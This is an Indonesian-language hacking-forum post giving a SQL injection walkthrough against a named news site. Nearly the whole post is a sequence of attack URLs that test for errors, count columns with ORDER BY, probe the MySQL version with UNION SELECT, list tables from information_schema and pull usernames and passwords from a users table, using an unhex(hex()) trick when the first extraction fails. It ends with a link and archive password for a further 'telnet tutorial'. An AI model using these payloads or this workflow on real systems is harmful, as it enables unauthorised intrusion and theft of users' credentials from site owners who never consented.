pokokmen
New member
ni da sdkit tutorial tentang sql injection
target = http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27
oke kita mulai aja
http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27 --> Normal page
kita test
http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27' --> Error hehe
http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27 order by 1/* --> test column
http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27 order by 13/* --> column ke 13 error => berarti g ad
http://www.myesia.com/esia.php?id=2...union all select 1,2,3,4,5,6,7,8,9,10,11,12/* --> column yang terbuka 2 dan 4
test version mysql
http://www.myesia.com/esia.php?id=2...l select 1,2,3,version(),5,6,7,8,9,10,11,12/* --> pake' mysql versi 5 hehe bisa d schema ni
http://www.myesia.com/esia.php?id=2...8,9,10,11,12 from information_schema.tables/* --> table dah muncul semua
ambil yang penting aja (admin)
http://www.myesia.com/esia.php?id=2...x3a,password),5,6,7,8,9,10,11,12 from users/* --> gak mau d extrak ni oke deh
cara kedua unhex(hex())
http://www.myesia.com/esia.php?id=2...a,password))),5,6,7,8,9,10,11,12 from users/* --> username sama password udah ketemu
Selesai, be nice hacker bro....
telnet tutorial
http://www.leetupload.com/dbindex2/index.php?dir=Win32/
password:crazy-coderz.net